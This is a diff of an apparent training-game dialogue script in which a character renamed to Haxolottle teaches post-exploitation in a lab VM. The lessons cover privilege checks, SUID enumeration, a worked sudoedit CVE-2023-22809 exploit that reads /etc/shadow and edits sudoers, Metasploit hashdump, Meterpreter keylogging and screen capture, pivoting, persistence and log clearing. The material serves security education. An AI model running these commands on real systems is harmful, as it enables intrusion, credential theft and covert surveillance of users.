understand the system, find sensitive data, escalate to higher privileges, and ensure you can maintain access. - Advanced Tactics Instructor: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access. + Haxolottle: In a real penetration test, you're demonstrating impact - showing what an attacker could actually DO with that access. - Advanced Tactics Instructor: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems. + Haxolottle: That means accessing sensitive files, dumping credentials, and potentially moving laterally to other systems. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What determines what you can do post-exploitation?] - Advanced Tactics Instructor: Several factors determine your capabilities: + Haxolottle: Several factors determine your capabilities: - Advanced Tactics Instructor: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features. + Haxolottle: First, the type of payload you used. A simple shell gives you command execution. Meterpreter gives you advanced features. - Advanced Tactics Instructor: Second, the security context - what user account is the vulnerable software running as? + Haxolottle: Second, the security context - what user account is the vulnerable software running as? - Advanced Tactics Instructor: Third, the access controls in place. Are there additional restrictions beyond standard user permissions? + Haxolottle: Third, the access controls in place. Are there additional restrictions beyond standard user permissions? - Advanced Tactics Instructor: Finally, your skill at the command line and understanding of the operating system. + Haxolottle: Finally, your skill at the command line and understanding of the operating system. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === shell_access === -Advanced Tactics Instructor: Shell access means you have access to a command line interface on the target system. +Haxolottle: Shell access means you have access to a command line interface on the target system. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell. +Haxolottle: On Windows, this is typically a Command Prompt or PowerShell. On Unix/Linux systems, it's usually a Bash shell. -Advanced Tactics Instructor: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output. +Haxolottle: Sometimes you'll see a familiar prompt. Other times you won't see any prompt at all, but you can still type commands and see output. + [What can I do with shell access?] - Advanced Tactics Instructor: With shell access, you can run almost any command-line program available on the system. + Haxolottle: With shell access, you can run almost any command-line program available on the system. - Advanced Tactics Instructor: You can list files, read documents, run scripts, check system information, create new files, and much more. + Haxolottle: You can list files, read documents, run scripts, check system information, create new files, and much more. - Advanced Tactics Instructor: However, you're limited by the permissions of whatever user account you're running as. + Haxolottle: However, you're limited by the permissions of whatever user account you're running as. - Advanced Tactics Instructor: If you're a normal user, you can't access administrator-only files or install system-wide software. + Haxolottle: If you're a normal user, you can't access administrator-only files or install system-wide software. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What commands should I avoid?] - Advanced Tactics Instructor: Avoid interactive programs that expect keyboard input and draw to the screen. + Haxolottle: Avoid interactive programs that expect keyboard input and draw to the screen. - Advanced Tactics Instructor: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit. + Haxolottle: For example, on Linux use "cat" instead of "less", because less expects you to scroll and press 'q' to quit. - Advanced Tactics Instructor: Avoid programs that run continuously until stopped, like "ping" without a count limit. + Haxolottle: Avoid programs that run continuously until stopped, like "ping" without a count limit. - Advanced Tactics Instructor: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command. + Haxolottle: Also be careful with Ctrl-C - it will likely kill your shell connection rather than just the current command. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's the difference between shells on Windows and Linux?] - Advanced Tactics Instructor: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/). + Haxolottle: Windows shells typically use backslashes in paths (C:\\Users\\), while Linux uses forward slashes (/home/). - Advanced Tactics Instructor: Common Windows commands: dir, type, net user, whoami, ipconfig + Haxolottle: Common Windows commands: dir, type, net user, whoami, ipconfig - Advanced Tactics Instructor: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a) + Haxolottle: Common Linux commands: ls, cat, whoami, id, ifconfig (or ip a) - Advanced Tactics Instructor: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0). + Haxolottle: The privilege model is different too - Windows has Administrator/System, Linux has root (UID 0). - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === assessing_access === -Advanced Tactics Instructor: The first question after exploitation is: what level of access do I have? +Haxolottle: The first question after exploitation is: what level of access do I have? -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: You need to determine what user account you're running as and what privileges that account has. +Haxolottle: You need to determine what user account you're running as and what privileges that account has. -Advanced Tactics Instructor: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user. +Haxolottle: On Windows, you might have Administrator, System, or a regular user account. On Linux, you want to know if you're root (UID 0) or a normal user. + [How do I check my access level on Linux?] - Advanced Tactics Instructor: Use these commands to assess your Linux access: + Haxolottle: Use these commands to assess your Linux access: - Advanced Tactics Instructor: whoami - Shows your username + Haxolottle: whoami - Shows your username - Advanced Tactics Instructor: id - Shows your user ID (UID), group ID (GID), and groups + Haxolottle: id - Shows your user ID (UID), group ID (GID), and groups - Advanced Tactics Instructor: id -u - Shows just the UID. A UID of 0 means you're root! + Haxolottle: id -u - Shows just the UID. A UID of 0 means you're root! - Advanced Tactics Instructor: Any other UID means you're a normal user with standard access controls applying. + Haxolottle: Any other UID means you're a normal user with standard access controls applying. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I check my access level on Windows?] - Advanced Tactics Instructor: On Windows, you can use: + Haxolottle: On Windows, you can use: - Advanced Tactics Instructor: whoami - Shows your username and domain + Haxolottle: whoami - Shows your username and domain - Advanced Tactics Instructor: whoami /priv - Shows your privileges + Haxolottle: whoami /priv - Shows your privileges - Advanced Tactics Instructor: net user USERNAME - Shows details about a user account + Haxolottle: net user USERNAME - Shows details about a user account - Advanced Tactics Instructor: If you have Meterpreter: getuid and getprivs give detailed privilege information. + Haxolottle: If you have Meterpreter: getuid and getprivs give detailed privilege information. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What if I don't have root or Administrator access?] - Advanced Tactics Instructor: That's very common! Most services run as unprivileged users for security reasons. + Haxolottle: That's very common! Most services run as unprivileged users for security reasons. - Advanced Tactics Instructor: You can still access files that user can read, which might include sensitive data. + Haxolottle: You can still access files that user can read, which might include sensitive data. - Advanced Tactics Instructor: You can gather system information to look for privilege escalation opportunities. + Haxolottle: You can gather system information to look for privilege escalation opportunities. - Advanced Tactics Instructor: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root. + Haxolottle: On Linux, try accessing /etc/shadow - if you can't, that confirms you're not root. - Advanced Tactics Instructor: Then you'll want to look for privilege escalation vulnerabilities. + Haxolottle: Then you'll want to look for privilege escalation vulnerabilities. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === info_gathering === -Advanced Tactics Instructor: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves. +Haxolottle: Information gathering continues even after exploitation. Understanding the system helps you plan your next moves. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: You want to learn about the operating system, installed software, network configuration, running processes, and other users. +Haxolottle: You want to learn about the operating system, installed software, network configuration, running processes, and other users. + [What system information should I gather on Linux?] - Advanced Tactics Instructor: Key commands for Linux information gathering: + Haxolottle: Key commands for Linux information gathering: - Advanced Tactics Instructor: uname -a (kernel version and architecture) + Haxolottle: uname -a (kernel version and architecture) - Advanced Tactics Instructor: cat /proc/cpuinfo (CPU details) + Haxolottle: cat /proc/cpuinfo (CPU details) - Advanced Tactics Instructor: free -h (memory usage) + Haxolottle: free -h (memory usage) - Advanced Tactics Instructor: df -h (disk usage and partitions) + Haxolottle: df -h (disk usage and partitions) - Advanced Tactics Instructor: env (environment variables) + Haxolottle: env (environment variables) - Advanced Tactics Instructor: cat /etc/passwd (list of user accounts) + Haxolottle: cat /etc/passwd (list of user accounts) - Advanced Tactics Instructor: This information helps you understand the target and identify potential attack vectors. + Haxolottle: This information helps you understand the target and identify potential attack vectors. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Why check the sudo version?] - Advanced Tactics Instructor: The sudo command allows users to run commands with elevated privileges. + Haxolottle: The sudo command allows users to run commands with elevated privileges. - Advanced Tactics Instructor: Check the version with: sudo --version + Haxolottle: Check the version with: sudo --version - Advanced Tactics Instructor: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation! + Haxolottle: Certain versions of sudo have critical security vulnerabilities that allow privilege escalation! - Advanced Tactics Instructor: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1. + Haxolottle: For example, CVE-2023-22809 affects sudo versions 1.8.0 through 1.9.12p1. - Advanced Tactics Instructor: Finding a vulnerable sudo version is a goldmine for privilege escalation. + Haxolottle: Finding a vulnerable sudo version is a goldmine for privilege escalation. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What network information is useful?] - Advanced Tactics Instructor: Network information reveals what other systems you might be able to reach: + Haxolottle: Network information reveals what other systems you might be able to reach: - Advanced Tactics Instructor: ifconfig or ip a (network interfaces and IP addresses) + Haxolottle: ifconfig or ip a (network interfaces and IP addresses) - Advanced Tactics Instructor: netstat -an or ss -an (active connections and listening ports) + Haxolottle: netstat -an or ss -an (active connections and listening ports) - Advanced Tactics Instructor: route or ip route (routing table) + Haxolottle: route or ip route (routing table) - Advanced Tactics Instructor: cat /etc/resolv.conf (DNS configuration) + Haxolottle: cat /etc/resolv.conf (DNS configuration) - Advanced Tactics Instructor: This helps you identify other systems to pivot to or internal networks to explore. + Haxolottle: This helps you identify other systems to pivot to or internal networks to explore. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === privilege_escalation === -Advanced Tactics Instructor: Privilege escalation means gaining additional privileges you weren't intentionally granted. +Haxolottle: Privilege escalation means gaining additional privileges you weren't intentionally granted. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level. +Haxolottle: Vertical privilege escalation is going from normal user to administrator/root. Horizontal privilege escalation is accessing resources of another user at the same privilege level. -Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations. +Haxolottle: Privilege escalation exploits vulnerabilities in the kernel, system software, or misconfigurations. + [What are common privilege escalation vectors?] - Advanced Tactics Instructor: Common privilege escalation opportunities include: + Haxolottle: Common privilege escalation opportunities include: - Advanced Tactics Instructor: Vulnerable kernel versions with known local exploits + Haxolottle: Vulnerable kernel versions with known local exploits - Advanced Tactics Instructor: Vulnerable system software like sudo, polkit, or services + Haxolottle: Vulnerable system software like sudo, polkit, or services - Advanced Tactics Instructor: Misconfigured SUID binaries on Linux + Haxolottle: Misconfigured SUID binaries on Linux - Advanced Tactics Instructor: Weak file permissions on sensitive files + Haxolottle: Weak file permissions on sensitive files - Advanced Tactics Instructor: Scheduled tasks running as administrators + Haxolottle: Scheduled tasks running as administrators - Advanced Tactics Instructor: Credentials stored in plaintext or easily crackable formats + Haxolottle: Credentials stored in plaintext or easily crackable formats - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I find privilege escalation opportunities?] - Advanced Tactics Instructor: Systematic enumeration is key: + Haxolottle: Systematic enumeration is key: - Advanced Tactics Instructor: Check kernel and software versions against CVE databases + Haxolottle: Check kernel and software versions against CVE databases - Advanced Tactics Instructor: Look for SUID binaries: find / -perm -4000 2>/dev/null + Haxolottle: Look for SUID binaries: find / -perm -4000 2>/dev/null - Advanced Tactics Instructor: Check sudo permissions: sudo -l + Haxolottle: Check sudo permissions: sudo -l - Advanced Tactics Instructor: Look for world-writable files in sensitive directories + Haxolottle: Look for world-writable files in sensitive directories - Advanced Tactics Instructor: Check for credentials in config files, bash history, and environment variables + Haxolottle: Check for credentials in config files, bash history, and environment variables - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Tell me about the sudo vulnerability] -> sudo_vulnerability @@ -296,610 +296,610 @@ Advanced Tactics Instructor: Privilege escalation exploits vulnerabilities in th - -> post_exploit_hub === sudo_vulnerability === -Advanced Tactics Instructor: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1. +Haxolottle: CVE-2023-22809 is a critical sudo vulnerability affecting versions 1.8.0 through 1.9.12p1. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: The vulnerability is in sudoedit, which allows editing files with elevated privileges. +Haxolottle: The vulnerability is in sudoedit, which allows editing files with elevated privileges. -Advanced Tactics Instructor: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to. +Haxolottle: By manipulating environment variables, you can trick sudoedit into opening files you shouldn't have access to. + [How does this vulnerability work?] - Advanced Tactics Instructor: The vulnerability exploits how sudoedit processes the EDITOR environment variable. + Haxolottle: The vulnerability exploits how sudoedit processes the EDITOR environment variable. - Advanced Tactics Instructor: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files. + Haxolottle: Normally, sudoedit restricts which files you can edit. But a coding mistake means you can use "--" to specify additional files. - Advanced Tactics Instructor: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + Haxolottle: For example: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts - Advanced Tactics Instructor: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges! + Haxolottle: This tells sudoedit to use "cat" as the editor and tricks it into opening /etc/shadow with root privileges! - Advanced Tactics Instructor: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation. + Haxolottle: The /etc/hosts file is just a decoy to satisfy sudoedit's normal operation. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How can I use this to escalate privileges?] - Advanced Tactics Instructor: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts + Haxolottle: First, you can read sensitive files: EDITOR='cat -- /etc/shadow' sudoedit /etc/hosts - Advanced Tactics Instructor: This gives you password hashes which you might crack offline. + Haxolottle: This gives you password hashes which you might crack offline. - Advanced Tactics Instructor: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts + Haxolottle: More powerfully, you can edit the sudoers file: EDITOR='vim -- /etc/sudoers' sudoedit /etc/hosts - Advanced Tactics Instructor: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL + Haxolottle: Add a line like: distccd ALL=(ALL) NOPASSWD:ALL - Advanced Tactics Instructor: This allows your user to run any command as root without a password: sudo -i + Haxolottle: This allows your user to run any command as root without a password: sudo -i - Advanced Tactics Instructor: Now you're root! + Haxolottle: Now you're root! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's tricky about exploiting this?] - Advanced Tactics Instructor: The challenge is that your simple shell doesn't support full interactive programs well. + Haxolottle: The challenge is that your simple shell doesn't support full interactive programs well. - Advanced Tactics Instructor: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly. + Haxolottle: When you use vim to edit /etc/sudoers, the display will be distorted and arrow keys won't work properly. - Advanced Tactics Instructor: You need to carefully use vim commands without visual feedback: + Haxolottle: You need to carefully use vim commands without visual feedback: "G" then "o" to go to bottom and insert new line, type your new line, "Esc" then ":x" to save. - Advanced Tactics Instructor: Be very careful - if you corrupt /etc/sudoers, you'll break the VM! + Haxolottle: Be very careful - if you corrupt /etc/sudoers, you'll break the VM! - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === msf_post_modules === -Advanced Tactics Instructor: Metasploit has numerous post-exploitation modules for automated information gathering and attacks. +Haxolottle: Metasploit has numerous post-exploitation modules for automated information gathering and attacks. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: These modules run against established sessions to collect data, escalate privileges, or set up persistence. +Haxolottle: These modules run against established sessions to collect data, escalate privileges, or set up persistence. -Advanced Tactics Instructor: They're categorized by operating system and function: gather, escalate, manage, recon, and more. +Haxolottle: They're categorized by operating system and function: gather, escalate, manage, recon, and more. + [How do I use post-exploitation modules?] - Advanced Tactics Instructor: First, you need an active session. Background it with Ctrl-Z. + Haxolottle: First, you need an active session. Background it with Ctrl-Z. - Advanced Tactics Instructor: Check your session ID: sessions + Haxolottle: Check your session ID: sessions - Advanced Tactics Instructor: Select a post module: use post/linux/gather/checkvm + Haxolottle: Select a post module: use post/linux/gather/checkvm - Advanced Tactics Instructor: Set the session: setg SESSION 1 (or your session ID) + Haxolottle: Set the session: setg SESSION 1 (or your session ID) - Advanced Tactics Instructor: Using "setg" sets it globally, so you don't have to set it for each module. + Haxolottle: Using "setg" sets it globally, so you don't have to set it for each module. - Advanced Tactics Instructor: Run the module: exploit (or run) + Haxolottle: Run the module: exploit (or run) - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What useful post-exploitation modules exist?] - Advanced Tactics Instructor: For Linux targets, valuable modules include: + Haxolottle: For Linux targets, valuable modules include: - Advanced Tactics Instructor: post/linux/gather/checkvm - Detect if running in a VM + Haxolottle: post/linux/gather/checkvm - Detect if running in a VM - Advanced Tactics Instructor: post/linux/gather/enum_configs - Download config files + Haxolottle: post/linux/gather/enum_configs - Download config files - Advanced Tactics Instructor: post/linux/gather/enum_network - Network configuration + Haxolottle: post/linux/gather/enum_network - Network configuration - Advanced Tactics Instructor: post/linux/gather/enum_system - System and software information + Haxolottle: post/linux/gather/enum_system - System and software information - Advanced Tactics Instructor: post/linux/gather/enum_users_history - Command history and logs + Haxolottle: post/linux/gather/enum_users_history - Command history and logs - Advanced Tactics Instructor: post/linux/gather/hashdump - Dump password hashes + Haxolottle: post/linux/gather/hashdump - Dump password hashes - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Where does collected information get stored?] - Advanced Tactics Instructor: Post-exploitation modules store collected data as "loot" in Metasploit's database. + Haxolottle: Post-exploitation modules store collected data as "loot" in Metasploit's database. - Advanced Tactics Instructor: The module output tells you where files are saved, usually in ~/.msf4/loot/ + Haxolottle: The module output tells you where files are saved, usually in ~/.msf4/loot/ - Advanced Tactics Instructor: You can view loot with: loot + Haxolottle: You can view loot with: loot - Advanced Tactics Instructor: Files are timestamped and categorized, making it easy to review later for report writing. + Haxolottle: Files are timestamped and categorized, making it easy to review later for report writing. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === meterpreter_intro === -Advanced Tactics Instructor: Meterpreter is an advanced payload originally developed by Matt Miller (Skape). +Haxolottle: Meterpreter is an advanced payload originally developed by Matt Miller (Skape). -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features. +Haxolottle: Unlike a simple shell, Meterpreter provides a sophisticated remote administration framework with many built-in features. -Advanced Tactics Instructor: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications. +Haxolottle: It's dynamically extensible - features can be loaded as needed. By default, it encrypts all communications. + [What makes Meterpreter special?] - Advanced Tactics Instructor: Meterpreter has numerous advantages over basic shells: + Haxolottle: Meterpreter has numerous advantages over basic shells: - Advanced Tactics Instructor: Runs entirely in memory - doesn't write to disk, making forensics harder + Haxolottle: Runs entirely in memory - doesn't write to disk, making forensics harder - Advanced Tactics Instructor: Encrypted communications by default + Haxolottle: Encrypted communications by default - Advanced Tactics Instructor: Rich command set for file browsing, process manipulation, network operations + Haxolottle: Rich command set for file browsing, process manipulation, network operations - Advanced Tactics Instructor: Can migrate between processes to hide or achieve persistence + Haxolottle: Can migrate between processes to hide or achieve persistence - Advanced Tactics Instructor: Extensible with post-exploitation modules + Haxolottle: Extensible with post-exploitation modules - Advanced Tactics Instructor: Includes "spyware" features like keylogging and screen capture + Haxolottle: Includes "spyware" features like keylogging and screen capture - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I use Meterpreter commands?] - Advanced Tactics Instructor: Start by viewing available commands: help + Haxolottle: Start by viewing available commands: help - Advanced Tactics Instructor: Get current privileges: getuid and getprivs + Haxolottle: Get current privileges: getuid and getprivs - Advanced Tactics Instructor: Browse files: ls c:/ (Windows) or ls / (Linux) + Haxolottle: Browse files: ls c:/ (Windows) or ls / (Linux) - Advanced Tactics Instructor: Download files: download /path/to/file + Haxolottle: Download files: download /path/to/file - Advanced Tactics Instructor: Upload files: upload /local/file /remote/file + Haxolottle: Upload files: upload /local/file /remote/file - Advanced Tactics Instructor: View processes: ps + Haxolottle: View processes: ps - Advanced Tactics Instructor: Migrate to another process: migrate PID + Haxolottle: Migrate to another process: migrate PID - Advanced Tactics Instructor: Drop to a system shell: shell (Ctrl-D to return to Meterpreter) + Haxolottle: Drop to a system shell: shell (Ctrl-D to return to Meterpreter) - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How does Meterpreter avoid detection?] - Advanced Tactics Instructor: Meterpreter is designed for stealth: + Haxolottle: Meterpreter is designed for stealth: - Advanced Tactics Instructor: It stays in memory and doesn't write files to disk (fileless malware) + Haxolottle: It stays in memory and doesn't write files to disk (fileless malware) - Advanced Tactics Instructor: By default it masquerades as "svchost.exe" on Windows, a common legitimate process + Haxolottle: By default it masquerades as "svchost.exe" on Windows, a common legitimate process - Advanced Tactics Instructor: It can migrate into other running processes, making it hard to identify + Haxolottle: It can migrate into other running processes, making it hard to identify - Advanced Tactics Instructor: Communications are encrypted, making network monitoring less effective + Haxolottle: Communications are encrypted, making network monitoring less effective - Advanced Tactics Instructor: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis. + Haxolottle: However, modern endpoint detection systems can still identify Meterpreter through behavioral analysis. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === meterpreter_spyware === -Advanced Tactics Instructor: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge. +Haxolottle: Meterpreter includes features typically associated with spyware - monitoring user activity without their knowledge. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: These features can capture keystrokes, screenshots, and even webcam feeds. +Haxolottle: These features can capture keystrokes, screenshots, and even webcam feeds. -Advanced Tactics Instructor: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise. +Haxolottle: While concerning for privacy, they're useful for security testing to demonstrate the risk of compromise. + [How does keylogging work in Meterpreter?] - Advanced Tactics Instructor: Meterpreter can capture all keystrokes on the target system. + Haxolottle: Meterpreter can capture all keystrokes on the target system. - Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes + Haxolottle: In Armitage: Right-click target → Meterpreter → Explore → Log Keystrokes - Advanced Tactics Instructor: Set CAPTURE_TYPE to "winlogon" to capture login attempts + Haxolottle: Set CAPTURE_TYPE to "winlogon" to capture login attempts - Advanced Tactics Instructor: Via command line: keyscan_start (then keyscan_dump to view results) + Haxolottle: Via command line: keyscan_start (then keyscan_dump to view results) - Advanced Tactics Instructor: This captures everything typed - passwords, emails, documents, searches. + Haxolottle: This captures everything typed - passwords, emails, documents, searches. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do I capture screenshots?] - Advanced Tactics Instructor: Screenshots show what the user is viewing: + Haxolottle: Screenshots show what the user is viewing: - Advanced Tactics Instructor: screenshot - Captures current screen + Haxolottle: screenshot - Captures current screen - Advanced Tactics Instructor: The image is downloaded to your Kali system and automatically opened + Haxolottle: The image is downloaded to your Kali system and automatically opened - Advanced Tactics Instructor: This can reveal sensitive documents, credentials, or user behavior + Haxolottle: This can reveal sensitive documents, credentials, or user behavior - Advanced Tactics Instructor: In Armitage, there are menu options for screen capture in the Meterpreter menu. + Haxolottle: In Armitage, there are menu options for screen capture in the Meterpreter menu. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [Can I get full graphical control?] - Advanced Tactics Instructor: Yes! You can use VNC for full graphical remote control: + Haxolottle: Yes! You can use VNC for full graphical remote control: - Advanced Tactics Instructor: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC) + Haxolottle: In Armitage: Right-click target → Meterpreter → Interact → Desktop (VNC) - Advanced Tactics Instructor: Armitage starts a VNC server on the target and tells you the port + Haxolottle: Armitage starts a VNC server on the target and tells you the port - Advanced Tactics Instructor: Connect with: vncviewer 127.0.0.1:PORT + Haxolottle: Connect with: vncviewer 127.0.0.1:PORT - Advanced Tactics Instructor: You'll see and control the target's desktop just like sitting at their keyboard! + Haxolottle: You'll see and control the target's desktop just like sitting at their keyboard! - Advanced Tactics Instructor: This is powerful but obvious to any user who's watching their screen. + Haxolottle: This is powerful but obvious to any user who's watching their screen. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === pivoting === -Advanced Tactics Instructor: Pivoting means using a compromised system as a stepping stone to attack other systems. +Haxolottle: Pivoting means using a compromised system as a stepping stone to attack other systems. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access. +Haxolottle: Often attackers can't directly reach internal systems - firewalls, NAT, and network segmentation block direct access. -Advanced Tactics Instructor: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it. +Haxolottle: But if you compromise a system that CAN reach those internal systems, you can route your attacks through it. + [Why would I need to pivot?] - Advanced Tactics Instructor: Several scenarios require pivoting: + Haxolottle: Several scenarios require pivoting: - Advanced Tactics Instructor: Attacking internal systems from a compromised public-facing server + Haxolottle: Attacking internal systems from a compromised public-facing server - Advanced Tactics Instructor: Accessing networks behind firewalls or NAT + Haxolottle: Accessing networks behind firewalls or NAT - Advanced Tactics Instructor: Moving laterally through a corporate network + Haxolottle: Moving laterally through a corporate network - Advanced Tactics Instructor: Hiding your true origin by routing through multiple compromised hosts + Haxolottle: Hiding your true origin by routing through multiple compromised hosts - Advanced Tactics Instructor: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems. + Haxolottle: In real penetration tests, you often start from a DMZ server and need to pivot to reach critical internal systems. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How does Meterpreter pivoting work?] - Advanced Tactics Instructor: Meterpreter can set up routing so all your attacks go through a compromised host. + Haxolottle: Meterpreter can set up routing so all your attacks go through a compromised host. - Advanced Tactics Instructor: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot + Haxolottle: In Armitage: Right-click compromised host → Meterpreter → Pivoting → Setup → Add Pivot - Advanced Tactics Instructor: Via command line, you use the "route" command in msfconsole + Haxolottle: Via command line, you use the "route" command in msfconsole - Advanced Tactics Instructor: Once configured, any Metasploit attacks you launch will be routed through that system + Haxolottle: Once configured, any Metasploit attacks you launch will be routed through that system - Advanced Tactics Instructor: The pivoted attacks will appear to come from the compromised system, not your Kali VM. + Haxolottle: The pivoted attacks will appear to come from the compromised system, not your Kali VM. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [What's port forwarding?] - Advanced Tactics Instructor: Port forwarding is a simpler form of pivoting. + Haxolottle: Port forwarding is a simpler form of pivoting. - Advanced Tactics Instructor: You instruct a compromised system to listen on a port and forward connections to a different host and port. + Haxolottle: You instruct a compromised system to listen on a port and forward connections to a different host and port. - Advanced Tactics Instructor: For example, forward local port 8080 to an internal web server on 10.0.0.5:80 + Haxolottle: For example, forward local port 8080 to an internal web server on 10.0.0.5:80 - Advanced Tactics Instructor: This makes the internal service accessible through the compromised system. + Haxolottle: This makes the internal service accessible through the compromised system. - Advanced Tactics Instructor: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5 + Haxolottle: Meterpreter's portfwd command handles this: portfwd add -l 8080 -p 80 -r 10.0.0.5 - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 - -> post_exploit_hub === persistence_evasion === -Advanced Tactics Instructor: Maintaining access and covering tracks are advanced post-exploitation techniques. +Haxolottle: Maintaining access and covering tracks are advanced post-exploitation techniques. -~ instructor_rapport += 5 +~ haxolottle_rapport += 5 -Advanced Tactics Instructor: Persistence means ensuring you can regain access even if the system reboots or the service is restarted. +Haxolottle: Persistence means ensuring you can regain access even if the system reboots or the service is restarted. -Advanced Tactics Instructor: Covering tracks means removing evidence of the attack from logs and the filesystem. +Haxolottle: Covering tracks means removing evidence of the attack from logs and the filesystem. + [How do attackers maintain access?] - Advanced Tactics Instructor: Common persistence mechanisms include: + Haxolottle: Common persistence mechanisms include: - Advanced Tactics Instructor: Creating new user accounts with administrative privileges + Haxolottle: Creating new user accounts with administrative privileges - Advanced Tactics Instructor: Installing backdoors that run on boot (services, scheduled tasks, startup scripts) + Haxolottle: Installing backdoors that run on boot (services, scheduled tasks, startup scripts) - Advanced Tactics Instructor: Modifying SSH authorized_keys to allow your key + Haxolottle: Modifying SSH authorized_keys to allow your key - Advanced Tactics Instructor: Installing rootkits that hide processes and files + Haxolottle: Installing rootkits that hide processes and files - Advanced Tactics Instructor: Meterpreter has post-exploitation modules specifically for persistence. + Haxolottle: Meterpreter has post-exploitation modules specifically for persistence. - ~ instructor_rapport += 5 + ~ haxolottle_rapport += 5 + [How do you cover your tracks?] - Advanced Tactics Instructor: Covering tracks involves removing or modifying evidence: + Haxolottle: Covering tracks involves removing or modifying evidence: - Advanced Tactics Instructor: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.) + Haxolottle: Clearing log files (on Linux: /var/log/auth.log, /var/log/syslog, etc.) - Advanced Tactics Instructor: Clearing command history (bash history, PowerShell history) + Haxolottle: Clearing command history (bash history, PowerShell history) - Advanced Tactics Instructor: Removing uploaded tools and malware + Haxolottle: Removing uploaded tools and malware - Advanced Tactics Instructor: Modifying file timestamps to match surrounding files + Haxolottle: Modifying file timestamps to match surrounding files - Advanced Tactics Instructor: However, sophisticated forensics can often detect these modifications. + Haxolottle: However, sophisticated forensics can often detect these modifications. - 